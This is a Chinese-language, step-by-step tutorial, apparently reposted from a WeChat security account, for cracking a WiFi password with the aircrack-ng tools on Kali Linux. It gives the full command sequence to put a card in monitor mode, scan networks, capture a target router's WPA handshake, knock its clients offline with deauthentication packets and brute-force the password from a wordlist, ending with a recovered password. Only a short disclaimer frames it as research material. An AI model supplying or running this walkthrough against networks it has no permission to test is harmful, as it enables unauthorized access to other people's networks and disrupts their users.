一、连接无线网卡
开始破解,首先开始第一步打开kali系统。
然后插入我们的无线网卡。选择连接到虚拟机。
连接好后,打开个命令终端使用airmon-ng命令查看是否连接成功。
可以看到已经连接成功,wlan0就是我的无线网卡。
二、开启网卡监听
命令:airmon-ng start wlan0
开启监听后使用ifconfig命令查看网卡,可以发现我的网卡名字变成了wlan0mon
当然也会出现网卡名称不变的情况,这都很正常。后面我就以wlan0mon来指定我的网卡了。
三、扫描周边的Wifi信号
命令:airodump-ng wlan0mon
可以看到扫描到的无线名称,当看到目标无线名称后按空格键暂停扫描。再按Ctrl+C退出扫描。
四、抓取握手数据包
使用命令pwd来查看当前所在的目录。
抓包命令:
airodump-ng -w ryan -c 1 --bssid 7C:B5:40:14:48:07 wlan0mon
-c:指定目标无线的信道。
-w:指定抓取数据包存放的位置或名称。
--bssid:指定目标无线的MAC地址。
抓到握手数据包后,新打开一个命令端。输入以下命令。
命令:
aireplay-ng -0 2 -a 7C:B5:40:14:48:07 -c 92:F2:F5:18:9E:E4 wlan0mon
-0:指发送反认证包的个数
-a:指定目标无线路由器的MAC地址
-c:指定本地无线网卡的MAC地址
五、破解握手包
找到握手包文件,(因为我多尝试了几次,所以保存的握手包较多。)
执行爆破命令:aircrack-ng -w zidian.txt ryan-*.cap
-w:指定密码字典文件。
ryan-*.cap:由于太多的握手包文件,直接*号全部自动匹配。
按回车开始爆破!!!!得到无线密码为1234567890
原文始发于微信公众号(如棠安全):【渗透干货-近源渗透】破解WiFi无线网络教程(保姆级教程)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论